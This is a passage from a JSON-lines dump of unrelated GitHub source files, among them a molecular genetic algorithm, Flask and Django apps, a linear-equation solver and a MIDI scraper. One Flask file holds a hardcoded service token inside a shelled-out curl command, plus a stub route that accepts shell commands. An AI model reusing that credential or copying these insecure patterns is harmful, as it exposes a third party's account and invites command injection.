{cipherText}\")\n\n# decrypted_text = decrypt(cipherText, workingKey)\n# print(f\"Decrypted: {decrypted_text}\")\n","repo_name":"Illucious/balajicovers-backend","sub_path":"backend/payments/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74631443665","text":"'''\nWritten by Jan H. Jensen 2018. \nMany subsequent changes inspired by https://github.com/BenevolentAI/guacamol_baselines/tree/master/graph_ga\n'''\n\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import Descriptors\nfrom rdkit.Chem import rdmolops\n\n#from rdkit import rdBase\n#rdBase.DisableLog('rdApp.error')\nfrom rdkit import RDLogger \nRDLogger.DisableLog('rdApp.*')\n\nimport numpy as np\nimport random\nimport time\nimport sys\n\nimport crossover as co\nimport mutate as mu\nimport scoring_functions as sc\n\ndef read_file(file_name):\n mol_list = []\n with open(file_name,'r') as file:\n for smiles in file:\n mol_list.append(Chem.MolFromSmiles(smiles))\n\n return mol_list\n\ndef make_initial_population(population_size,file_name):\n mol_list = read_file(file_name)\n population = []\n for i in range(population_size):\n population.append(random.choice(mol_list))\n \n return population\n\ndef calculate_normalized_fitness(scores):\n sum_scores = sum(scores)\n normalized_fitness = [score/sum_scores for score in scores]\n\n return normalized_fitness\n\ndef make_mating_pool(population,fitness,mating_pool_size):\n mating_pool = []\n for i in range(mating_pool_size):\n \tmating_pool.append(np.random.choice(population, p=fitness))\n\n return mating_pool\n \n\ndef reproduce(mating_pool,population_size,mutation_rate):\n new_population = []\n while len(new_population) < population_size:\n parent_A = random.choice(mating_pool)\n parent_B = random.choice(mating_pool)\n new_child = co.crossover(parent_A,parent_B)\n if new_child != None:\n mutated_child = mu.mutate(new_child,mutation_rate)\n if mutated_child != None:\n #print(','.join([Chem.MolToSmiles(mutated_child),Chem.MolToSmiles(new_child),Chem.MolToSmiles(parent_A),Chem.MolToSmiles(parent_B)]))\n new_population.append(mutated_child)\n\n return new_population\n\ndef sanitize(population,scores,population_size, prune_population):\n if prune_population:\n smiles_list = []\n population_tuples = []\n for score, mol in zip(scores,population):\n smiles = Chem.MolToSmiles(mol)\n smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))\n if smiles not in smiles_list:\n smiles_list.append(smiles)\n population_tuples.append((score,mol))\n else:\n population_tuples = list(zip(scores,population))\n\n population_tuples = sorted(population_tuples, key=lambda x: x[0], reverse=True)[:population_size]\n new_population = [t[1] for t in population_tuples]\n new_scores = [t[0] for t in population_tuples]\n\n return new_population, new_scores\n\ndef GA(args):\n population_size, file_name,scoring_function,generations,mating_pool_size,mutation_rate, \\\n scoring_args, max_score, prune_population, seed = args\n\n np.random.seed(seed)\n random.seed(seed)\n \n high_scores = [] \n population = make_initial_population(population_size,file_name)\n scores = sc.calculate_scores(population,scoring_function,scoring_args)\n #reorder so best score comes first\n population, scores = sanitize(population, scores, population_size, False) \n high_scores.append((scores[0],Chem.MolToSmiles(population[0])))\n fitness = calculate_normalized_fitness(scores)\n\n for generation in range(generations):\n mating_pool = make_mating_pool(population,fitness,mating_pool_size)\n new_population = reproduce(mating_pool,population_size,mutation_rate)\n new_scores = sc.calculate_scores(new_population,scoring_function,scoring_args)\n population, scores = sanitize(population+new_population, scores+new_scores, population_size, prune_population) \n fitness = calculate_normalized_fitness(scores)\n high_scores.append((scores[0],Chem.MolToSmiles(population[0])))\n if scores[0] >= max_score:\n break\n\n return (scores, population, high_scores, generation+1)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"jensengroup/GB_GA","sub_path":"GB_GA.py","file_name":"GB_GA.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"40911334155","text":"#encoding:utf-8\n#!/usr/bin/env python\nfrom werkzeug.utils import secure_filename\nfrom flask import Flask, render_template, jsonify, request, make_response, send_from_directory, abort\nimport time\nimport os\nfrom strUtil import Pic_str\nimport base64\nfrom flask_bootstrap import Bootstrap\n# import ansible.runner\n# import commands\n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\n\nUPLOAD_FOLDER = 'upload'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nbasedir = os.path.abspath(os.path.dirname(__file__))\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'JPG', 'PNG', 'gif', 'GIF'])\n\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n \n# @app.route('/upload')\n# def upload_test():\n# return render_template('upload_pic.html')\n\n@app.route('/')\ndef upload():\n return render_template('upload_pic.html')\n\n\n# 上传文件\n@app.route('/up_photo', methods=['POST'], strict_slashes=False)\ndef api_upload():\n file_dir = os.path.join(basedir, app.config['UPLOAD_FOLDER'])\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n f = request.files['photo']\n if f and allowed_file(f.filename):\n fname = secure_filename(f.filename)\n print(fname)\n ext = fname.rsplit('.', 1)[1]\n new_filename = Pic_str().create_uuid() + '.' + ext\n f.save(os.path.join(file_dir, new_filename))\n # return render_template('upload_pic.html', result=1)\n #return jsonify({\"success\": 0, \"msg\": \"上传成功\"})\n #else:\n # return render_template('upload_pic.html', result=1)\n #return jsonify({\"error\": 1001, \"msg\": \"上传失败\"})\n #cmd = 'curl -X POST -H \"ServiceID:uaiservice-ad53msad\" -H \"Token:32f184961bc5d17e10c372ecad40e475\" http://uinference-sh2.ucloud.cn/service -T 2.jpg'\n cmd=' curl -X POST -H \"ServiceID:uaiservice-zsegqykh\" -H \"Token:5e40cfa614aba43c8f81da595e4d3b20\" http://uinference-sh2.service.ucloud.cn/service -T /data/2.png'\n msg = os.popen(cmd).read()\n print(msg)\n return render_template('upload_pic.html', result=msg.strip())\n\n\n@app.route('/download/', methods=['GET'])\ndef download(filename):\n if request.method == \"GET\":\n if os.path.isfile(os.path.join('upload', filename)):\n return send_from_directory('upload', filename, as_attachment=True)\n pass\n\n\n@app.route('/cmd', methods=['GET', 'POST'])\ndef index():\n if request.method == \"POST\":\n cmd = request.form.get('cmd', type=str, default=None)\n ip = request.form.get('ip', type=str, default=None)\n host_cfg = os.path.join(basedir, 'host.cfg')\n print(cmd, ip, host_cfg)\n # 1 or None None or 1\n # 1 and None None or 1\n # if cmd or ip:\n # 对比结果\n if cmd and ip:\n # runner = ansible.runner.Runner(\n # host_list=os.path.join(basedir, host_cfg),\n # module_name='shell',\n # module_args=cmd,\n # pattern=ip,\n # forks=10\n # )\n # datastructure = runner.run()\n # for key, value in datastructure.items():\n # if 'contacted' in key:\n # exec_result = value\n return render_template('upload_pic.html', result=\"test\", ip=ip, cmd=cmd)\n else:\n return render_template('upload_pic.html')\n else:\n return render_template('upload_pic.html') \n \n# show photo\n@app.route('/show/', methods=['GET'])\ndef show_photo(filename):\n file_dir = os.path.join(basedir, app.config['UPLOAD_FOLDER'])\n if request.method == 'GET':\n if filename is None:\n pass\n else:\n image_data = open(os.path.join(file_dir, '%s' % filename), \"rb\").read()\n response = make_response(image_data)\n response.headers['Content-Type'] = 'image/png'\n return response\n else:\n pass\n\n \nif __name__ == '__main__':\n app.run(debug=True,host='10.24.5.57',port=5000)#'10.24.5.57'","repo_name":"nchen909/flask_mongodb_game","sub_path":"cloudcompflaskex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"} +{"seq_id":"11432514548","text":"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_product_name_by_url(url):\n from bs4 import BeautifulSoup\n import requests\n r = requests.get(url, headers=headers)\n #print(data)\n soup = BeautifulSoup(r.content, 'html.parser')\n s = soup.find(\"meta\", {\"name\": \"keywords\"})\n product_name = s.get(\"content\").split(',')[0]\n print(product_name)\n\n # for tag in soup.find_all(\"meta\"):\n # if tag.get(\"name\", None) == \"keywords\":\n # print(tag.get(\"content\", None))\n\n #print(\"YAHOOOooo {}\".format(span))\n\nget_product_name_by_url('https://www.amazon.com/Sony-Cancelling-Behind-Neck-Headphones-International/dp/B075XF9VN9')","repo_name":"rrajaravi/ray","sub_path":"ray/ray_scrapy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5783498475","text":"import subprocess\nfrom collections import defaultdict\n\nimport numpy as np\nfrom Bio import Seq, SeqIO\n\n# load extant msa\nmsa_one = list(\n SeqIO.parse(\"MSA/fullheaders_globin_pfam_2022_filtered20pct.afa\", \"fasta\")\n)\nmsa_two = list(\n SeqIO.parse(\"MSA/top_fullheaders_desaturase_pfam_2022_filt20.afa\", \"fasta\")\n)\n\n# get TaxID for sequences\nheaders_msa_one = list()\nheaders_msa_two = list()\nfor sequence in msa_one:\n try:\n headers_msa_one.append(sequence.description.split(\"OX=\")[1].split()[0])\n except:\n headers_msa_one.append(\n \"-1\"\n ) # will never intersect with msa_two; no info in seq\n\nfor sequence in msa_two:\n try:\n headers_msa_two.append(sequence.description.split(\"OX=\")[1].split()[0])\n except:\n headers_msa_two.append(\n \"-2\"\n ) # will never intersect with msa_one; no info in seq\n\n# get list of taxid overlap (we can pair these successfully)\nintersect_set = set(headers_msa_one).intersection(headers_msa_two)\n\n# make key:value pair to link a header to a position in the msa\nmsa_one_dict = defaultdict(list)\nmsa_two_dict = defaultdict(list)\nfor idx, header in enumerate(headers_msa_one):\n if header in intersect_set:\n msa_one_dict[header].append(idx)\nfor idx, header in enumerate(headers_msa_two):\n if header in intersect_set:\n msa_two_dict[header].append(idx)\n\n\n# append taxid to the front of the header, so the\n# TreeDist package can compare taxid locations between the two trees\nfor label, sequence in zip(headers_msa_one, msa_one):\n sequence.id = label + \" - \" + sequence.id\nfor label, sequence in zip(headers_msa_two, msa_two):\n sequence.id = label + \" - \" + sequence.id\n\n# generate msa!\nfor i in range(100):\n header_choice = np.random.choice(list(intersect_set), 640, replace=False)\n sampled_msa_one = [\n msa_one[np.random.choice(msa_one_dict[header])] for header in header_choice\n ]\n sampled_msa_two = [\n msa_two[np.random.choice(msa_two_dict[header])] for header in header_choice\n ]\n SeqIO.write(\n sampled_msa_one, \"globin_msa/sampled_fasta_\" + str(i + 1) + \".fasta\", \"fasta\"\n )\n SeqIO.write(\n sampled_msa_two,\n \"desaturase_msa/sampled_fasta_\" + str(i + 1) + \".fasta\",\n \"fasta\",\n )\n\n# create trees!\nfor i in range(100):\n tree_one = \"globin_trees/sampled_fasta_\" + str(i + 1) + \".tree\"\n tree_two = \"desaturase_trees/sampled_fasta_\" + str(i + 1) + \".tree\"\n fasta_one = \"globin_msa/sampled_fasta_\" + str(i + 1) + \".fasta\"\n fasta_two = \"desaturase_msa/sampled_fasta_\" + str(i + 1) + \".fasta\"\n command_one = [\"./FastTree\", \"-out\", tree_one, fasta_one]\n command_two = [\"./FastTree\", \"-out\", tree_two, fasta_two]\n subprocess.run(command_one)\n subprocess.run(command_two)\n\n# clustering distance is computed in R script.\n","repo_name":"morcoslab/LGL-VAE","sub_path":"scripts/generate_interfamily_comparison_trees.py","file_name":"generate_interfamily_comparison_trees.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8206846845","text":"from classes.shared import db\nfrom classes import notifications, Sec\n\n\ndef sendMessage(subject, message, fromUser, toUser):\n newMessage = notifications.userMessage(subject, message, fromUser, toUser)\n db.session.add(newMessage)\n db.session.commit()\n return newMessage.messageID\n\n\ndef sendNotification(message, link, image, toUserID):\n newNotification = notifications.userNotification(message, link, image, toUserID)\n db.session.add(newNotification)\n db.session.commit()\n return newNotification.notificationID\n\n\ndef sendAdminNotification(message, link, image):\n adminList = []\n userQuery = Sec.User.query.all()\n for user in userQuery:\n if user.has_role(\"Admin\"):\n adminList.append(user)\n notificationArray = []\n for admin in adminList:\n notificationID = sendNotification(message, link, image, admin.id)\n notificationArray.append(notificationID)\n db.session.commit()\n return notificationArray\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"functions/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"70139571667","text":"from django.shortcuts import render\n\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import models\nfrom django import forms\nfrom .models import Users\nfrom .models import raport\nfrom .models import UserSession\nfrom django.shortcuts import render\nfrom .weather import general_alert\nimport string\nimport random\n\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = Users\n fields = ['user_id','username','password']\n\nclass newSession(forms.ModelForm):\n class Meta:\n model = UserSession\n fields = ['session_id','user_id']\n\nclass newData(forms.ModelForm):\n class Meta:\n model = raport\n fields = ['report_id','user_id','lat','lng','strada','path_to_Photo','description'] \n\ndef get_random_string(length):\n # choose from all lowercase letter\n letters = string.ascii_letters + string.digits + string.punctuation\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n\n\n\n@csrf_exempt\ndef rep_post(request):\n if(request.method=='POST'):\n newId=Users.objects.count()+1\n form = UserForm(request.POST)\n data = form.data.copy()\n data['user_id']=newId\n form.data=data\n if form.is_valid():\n print(form.data)\n form.save()\n \n else:\n print(\"Not Valid\")\n \n \n return JsonResponse({'message': 'done'})\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n@csrf_exempt\ndef user_post(request):\n if(request.method=='POST'):\n form = newData(request.POST)\n newId = raport.objects.count()+1\n data = form.data.copy()\n data['report_id']=newId\n print(data)\n form.data=data\n if form.is_valid():\n print(form.data)\n form.save()\n \n return JsonResponse({'message': 'done'})\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n\n@csrf_exempt\ndef log_usr(request):\n if(request.method=='POST'):\n form = UserForm(request.POST)\n check1=Users.objects.filter(username=form.data['username']).exists()\n check2=Users.objects.filter(password=form.data['password']).exists()\n if check1 and check2:\n session_id = get_random_string(42)\n fk_id = Users.objects.filter(username=form.data['username']).first() \n sessionForm = newSession()\n new_session = sessionForm.save(commit=False)\n new_session.session_id=session_id\n new_session.user_id=fk_id.user_id\n print(new_session)\n new_session.save()\n \n return JsonResponse({'value':{'session_id':session_id,'user_id':fk_id.user_id},'name':'session_id','status':200})\n\n else:\n return JsonResponse({'message': 'not Valid'})\n\n else:\n print(\"Not Working\")\n return HttpResponse(\"Nothing Here\")\n\n@csrf_exempt\ndef view_app(request):\n return render(request,\"locatie.html\")\n\n@csrf_exempt\ndef view_finalizare(request):\n element=raport.objects.latest('report_id')\n general_alert(element.strada,element.lat,element.lng)\n \n print(element.lat)\n return render(request,\"finalizare.html\")\n \n@csrf_exempt\ndef get_data(request):\n arr=[]\n for obj in raport.objects.all():\n arr.append({obj.strada,obj.lat,obj.lng,obj.description})\n print(arr)\n return arr\n\n","repo_name":"TRBogdann/Hackathon","sub_path":"server/raport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"189059679","text":"import copy\nimport math\nimport time\n\n\nclass MatrixProject:\n\n # N = 9cd\n # e - 4 cyfra nr indeksu\n # f - 3 cyfra nr indeksu\n # c - przedostatnia cyfra nr indeksu\n # d - ostatnia cyfra nr indeksu\n # indeks: 184589 -> N = 989\n def __init__(self, indexNumber):\n self.c = indexNumber % 100 // 10\n self.d = indexNumber % 10\n self.e = indexNumber % 1000 // 100\n self.f = indexNumber % 10_000 // 1000\n self.N = 9 * 100 + self.c * 10 + self.d * 1\n self.matrix = [[0 for x in range(self.N)] for y in range(self.N)]\n self.b = [0 for x in range(self.N)]\n self.time_jacobi = []\n self.time_gauss_seidel = []\n self.time_LU_factorization = []\n self.iterations_jacobi = []\n self.iterations_gauss_seidel = []\n self.iterations_LU_factorization = []\n self.jacobi_residual = []\n self.gauss_seidel_residual = []\n self.LU_factorization_residual = []\n\n def createVectorB(self):\n for j in range(self.N):\n n = math.sin(j * (self.f + 1))\n self.b[j] = n\n\n def createBandMatrix(self, a1, a2, a3):\n\n for i in range(self.N):\n if i < len(self.matrix) - 1:\n # 1th lower diagonal\n self.matrix[i + 1][i] = a2\n # 2nd lower diagonal\n if i < self.N - 2:\n self.matrix[i + 2][i] = a3\n\n if i > 0:\n # 1th upper diagonal\n self.matrix[i - 1][i] = a2\n # 2nd upper diagonal\n if i > 1:\n self.matrix[i - 2][i] = a3\n # main diagonal\n for j in range(self.N):\n if i == j:\n self.matrix[i][j] = a1\n\n def createBandSizeMatrix(self, a1, a2, a3, N):\n self.N = N\n self.matrix = [[0 for x in range(self.N)] for y in range(self.N)]\n self.b = [0 for x in range(self.N)]\n self.createVectorB()\n for i in range(self.N):\n if i < len(self.matrix) - 1:\n # 1th lower diagonal\n self.matrix[i + 1][i] = a2\n # 2nd lower diagonal\n if i < self.N - 2:\n self.matrix[i + 2][i] = a3\n\n if i > 0:\n # 1th upper diagonal\n self.matrix[i - 1][i] = a2\n # 2nd upper diagonal\n if i > 1:\n self.matrix[i - 2][i] = a3\n # main diagonal\n for j in range(self.N):\n if i == j:\n self.matrix[i][j] = a1\n\n @staticmethod\n def multiplyMatrixVector(matrix1, vector):\n # can't multiply matrix with different size\n if len(matrix1) != len(vector):\n return 0\n newVector = [0 for x in range(len(matrix1))]\n for i in range(len(newVector)):\n for j in range(len(newVector)):\n newVector[i] += matrix1[i][j] * vector[j]\n return newVector\n\n def calc_residual(self, matrix, r, b):\n newVector = self.multiplyMatrixVector(matrix, r)\n for i in range(len(newVector)):\n newVector[i] -= b[i]\n return newVector\n\n def jacobi_method(self):\n r = [1 for x in range(len(self.matrix))]\n r_prev = copy.deepcopy(r)\n norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n\n iteration = 0\n val = 10 ** (-9)\n residual = []\n start = time.time()\n while val < norm_res < 10e9:\n residual.append(norm_res)\n for i in range(len(r)):\n tmp_sum = 0\n for j in range(len(r)):\n if i != j:\n tmp_sum += self.matrix[i][j]*r_prev[j]\n r[i] = (self.b[i] - tmp_sum)/self.matrix[i][i]\n r_prev = copy.deepcopy(r)\n iteration += 1\n norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n end = time.time()\n timeString = str(end - start) + \" [s]\"\n normBiggerThan = \"Bigger than \" + str(norm_res)\n self.time_jacobi.append(end-start)\n self.iterations_jacobi.append(iteration)\n self.jacobi_residual.append(residual)\n print(f\"|=============== Jacobi Method ===============|\")\n print(f\"|-> Time: {timeString}\")\n print(f\"|-> Iteration: {iteration}\")\n print(f\"|-> Residuum: {norm_res if (norm_res < 10e9) else normBiggerThan}\")\n\n def gauss_method(self):\n r = [1 for x in range(len(self.matrix))]\n r_prev = copy.deepcopy(r)\n norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n\n iteration = 0\n val = 10 ** (-9)\n\n start = time.time()\n residual = []\n while val < norm_res < 10e9:\n residual.append(norm_res)\n for i in range(len(r)):\n tmp1 = 0\n tmp2 = 0\n for j in range(len(r)):\n if i > j:\n tmp1 += self.matrix[i][j] * r[j]\n if j > i:\n tmp2 += self.matrix[i][j] * r_prev[j]\n r[i] = (self.b[i] - tmp1 - tmp2) / self.matrix[i][i]\n r_prev = copy.deepcopy(r)\n iteration += 1\n norm_res = self.norm(self.calc_residual(self.matrix, r, self.b))\n end = time.time()\n timeString = str(end - start) + \" [s]\"\n normBiggerThan = \"Bigger than \" + str(norm_res)\n self.time_gauss_seidel.append(end-start)\n self.iterations_gauss_seidel.append(iteration)\n self.gauss_seidel_residual.append(residual)\n print(f\"|=============== Gauss-Seidel Method ===============|\")\n print(f\"|-> Time: {timeString}\")\n print(f\"|-> Iteration: {iteration}\")\n print(f\"|-> Residuum: {norm_res if (norm_res < 10e9) else normBiggerThan}\")\n\n def LU_factorization(self):\n start = time.time()\n\n U, L = create_LU(self.matrix, self.N)\n\n # podstawienie w przód (forward-substitution)\n y = [0 for y in range(len(U))]\n for i in range(len(y)):\n tmp = 0\n for k in range(i):\n tmp += L[i][k] * y[k]\n y[i] = (self.b[i] - tmp)/L[i][i]\n\n for i in y:\n print(i, end=\" \")\n print()\n\n # podstawienie wstecz (back-substitution)\n x = [0 for x in range(len(U))]\n for i in reversed(range(len(x))):\n tmp = 0\n for k in range(i+1, len(x)):\n tmp = tmp + U[i][k]*x[k]\n x[i] = (y[i] - tmp)/U[i][i]\n end = time.time()\n\n for i in x:\n print(i, end=\" \")\n print()\n timeString = str(end - start) + \" [s]\"\n\n norm_res = self.norm(self.calc_residual(self.matrix, x, self.b))\n self.time_LU_factorization.append(end-start)\n self.LU_factorization_residual.append(norm_res)\n print(f\"|=============== Faktoryzacja LU ===============|\")\n print(f\"|-> Time: {timeString}\")\n print(f\"|-> Residuum: {norm_res}\")\n\n @staticmethod\n def norm(vector):\n norm_res = 0\n for i in range(len(vector)):\n norm_res += vector[i] ** 2\n return math.sqrt(norm_res)\n\n @staticmethod\n def printMatrix(matrix):\n for i in range(len(matrix)):\n print(\"[\", end=\"\\t\")\n for j in range(len(matrix[i])):\n print(str(matrix[i][j]), end=\"\\t\\t\")\n print(\"]\")\n\n\ndef create_LU(matrix, N):\n U = copy.deepcopy(matrix)\n L = create_unit_matrix(N)\n for k in range(N - 1):\n for j in range(k + 1, N):\n L[j][k] = U[j][k] / U[k][k]\n for m in range(k, N):\n U[j][m] -= L[j][k] * U[k][m]\n return U, L\n\n\ndef create_unit_matrix(N):\n unit = [[0 for x in range(N)] for y in range(N)]\n for i in range(N):\n unit[i][i] = 1.0\n return unit","repo_name":"Krystian030/Numerical-Methods","sub_path":"Projects/System_of_linear_equations/MatrixProject.py","file_name":"MatrixProject.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24832125469","text":"\n# 获取telegram 群成员数据的程序入口\n\n\nfrom configparser import ConfigParser\nfrom src.TelegramChannelMemberExtractor import TGMemExtrator\n\ncfg = ConfigParser()\ncfg.read('./config/telegram_extractor.ini', encoding='utf-8')\nconfig = {\n 'TG_session_name': cfg.get('login_setting', 'TG_session_name'),\n 'TG_api_id': int(cfg.get('login_setting', 'TG_api_id')),\n 'TG_api_hash': cfg.get('login_setting', 'TG_api_hash'),\n 'proxy_address': cfg.get('login_setting', 'proxy_address'),\n 'proxy_port': int(cfg.get('login_setting', 'proxy_port')),\n 'group_member': cfg.get('download_addr', 'group_member'),\n 'group_avatar': cfg.get('download_addr', 'group_avatar')\n}\n\n\ndef extractor_get_member(username):\n tgMemExtrator = TGMemExtrator(config)\n\n flag = False\n tgMemExtrator.set_channel(username)\n tgMemExtrator.dumpTojson(flag)\n\n\ndef main():\n username = 'Advancedchat'\n extractor_get_member(username)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wschxida/test","sub_path":"telegram/get_member.py","file_name":"get_member.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36613959692","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 题目\n# \n# ### 在字符串中找出第一个只出现一次的字符。如输入“abaccdeff”,则输出“b”。\n\n# In[8]:\n\n\n'''\n思路:\n\n我们可以定义哈希表,哈希表的键值是字符,而值是该字符出现的次数。同时我们还需要从头开始扫描字符串两次,第一次扫描字符串时,每扫描到一个字符,就在哈希表的对应项中把次数加1.接下来第二次扫描时,每扫描到一个字符就能从哈希表得到该字符出现的次数。这样,第一个只出现一次的字符就是符合要求的输出\n'''\ndef FirstNotRepeatingChar(pString):\n if not pString:\n return None\n hashTable=[0]*256\n for i in pString:\n hashTable[ord(i)]+=1\n for i in pString:\n if hashTable[ord(i)]==1:\n return i\n break\n return None\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[10]:\n\n\n'''\n纯Python的代码\n'''\ndef FirstNotRepeatingChar(pString):\n if not pString:\n return None\n for i in pString:\n if pString.count(i)==1:\n return i\n return None\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[11]:\n\n\n'''\n更精简的一行代码\n'''\ndef FirstNotRepearingChar(pString):\n return pString.index(list(filter(lambda c:pString.count(c)==1,pString))[0]) if pString else -1\n\nFirstNotRepeatingChar(\"googlle\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"BHRY1314/offer_python","sub_path":"面试题50:第一个只出现一次的字符.py","file_name":"面试题50:第一个只出现一次的字符.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2347295245","text":"from flask import Flask, url_for, render_template, redirect\nfrom forms import PredictForm\nfrom flask import request, sessions\nimport requests\nfrom flask import json\nfrom flask import jsonify\nfrom flask import Request\nfrom flask import Response\nimport urllib3\nimport json\n# from flask_wtf import FlaskForm\n\napp = Flask(__name__, instance_relative_config=False)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.secret_key = 'development key' #you will need a secret key\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0')\n\n@app.route('/', methods=('GET', 'POST'))\n\ndef startApp():\n form = PredictForm()\n return render_template('index.html', form=form)\n\n@app.route('/predict', methods=('GET', 'POST'))\ndef predict():\n form = PredictForm()\n if form.submit():\n\n API_KEY = \"\" #Select Account > Users, go to Manage > Access (IAM) > API keys.\n token_response = requests.post('https://iam.cloud.ibm.com/identity/token', data={\"apikey\": API_KEY, \"grant_type\": 'urn:ibm:params:oauth:grant-type:apikey'})\n mltoken = token_response.json()[\"access_token\"]\n\n header = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + mltoken}\n\n if( form.case.data == None and form.symptoms_start_date.data == None and form.diagnosys_date.data == None and \n form.city.data == None and form.locality.data == None and form.age.data == None and form.age_unit.data == None and form.sex.data == None and \n form.contagion_type.data == None and form.current_location.data == None ): \n python_object = []\n else:\n python_object = [form.case.data, form.symptoms_start_date.data, form.diagnosys_date.data,\n form.city.data, form.locality.data, form.age.data, form.age_unit.data, form.sex.data,\n form.contagion_type.data, form.current_location.data ]\n #Transform python objects to Json\n\n userInput = []\n userInput.append(python_object)\n\n # NOTE: manually define and pass the array(s) of values to be scored in the next line\n payload_scoring = {\"input_data\": [{\"fields\": [\"case\", \"symptoms_start_date\", \"diagnosys_date\",\n \"city\", \"locality\", \"age\", \"age_unit\", \"sex\", \"contagion_type\", \"current_location\" ], \"values\": userInput }]}\n\n response_scoring = requests.post(\"https://us-south.ml.cloud.ibm.com/ml/v4/deployments//predictions?version=\", json=payload_scoring, headers={'Authorization': 'Bearer ' + mltoken})\n\n output = json.loads(response_scoring.text)\n\n\n form.abc = \"\"\n if 'predictions' in output.keys():\n ab = output['predictions']\n for key in ab[0]:\n bc = ab[0][key]\n # form.abc = roundedCharge # this returns the response back to the front page\n form.abc = bc[0][0] # this returns the response back to the front page\n \n return render_template('index.html', form=form)","repo_name":"mileruiz/IBM-autoAI","sub_path":"web-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36426525877","text":"#!/usr/bin/env python3\nimport connexion\nfrom connexion.resolver import RestyResolver\nfrom bbidder.utils.logger import logger\n\n\ndef main():\n app = connexion.App(__name__, specification_dir='swagger/')\n app.add_api('bluebananabidder.yaml', resolver=RestyResolver('bbidder.api'))\n application = app.app\n\n # run our standalone server\n logger.info('Starting BlueBanana\\'s Bidder ...')\n app.run(port=5000, server='gevent')\n\nif __name__ == '__main__':\n main()\n","repo_name":"ddamianidis/BlueBananaBidder","sub_path":"bbidder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36722326339","text":"#!/usr/bin/env python3\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport json\nimport os\nimport requests\nfrom multiprocessing.pool import Pool\n\nDL_URLS = [\n 'https://synthesiamaniac.com/downloads/animal-crossing/',\n 'https://synthesiamaniac.com/downloads/cave-story/',\n 'https://synthesiamaniac.com/downloads/donkey-kong/',\n 'https://synthesiamaniac.com/downloads/final-fantasy/',\n 'https://synthesiamaniac.com/downloads/legend-of-zelda/',\n 'https://synthesiamaniac.com/downloads/star-fox/',\n 'https://synthesiamaniac.com/downloads/medleys/',\n 'https://synthesiamaniac.com/downloads/more-games/',\n 'https://synthesiamaniac.com/downloads/miscellaneous/'\n]\nMIDI_URL_JSON = os.path.join(os.getcwd(), 'midi_urls.json')\nDL_DIR = os.path.join(os.getcwd(), 'midis')\nDL_INSTANCES = 4\n\ndef main():\n fetch_midi_urls()\n download_midis()\n\nclass synthesiamaniacDL(scrapy.Spider):\n\n name = \"synthesiamanicDL\"\n\n def start_requests(self):\n urls = DL_URLS\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n midi_sections = response.xpath('//div[contains(@class, \"czr-wp-the-content\")]/div[contains(@class, \"wp-block-pb-accordion-item\")]')\n for section in midi_sections:\n section_name = section.xpath('h4/text()')[0].get()\n midi_urls = section.xpath('div[contains(@class, \"c-accordion__content\")]/table/tr/td[contains(@class, 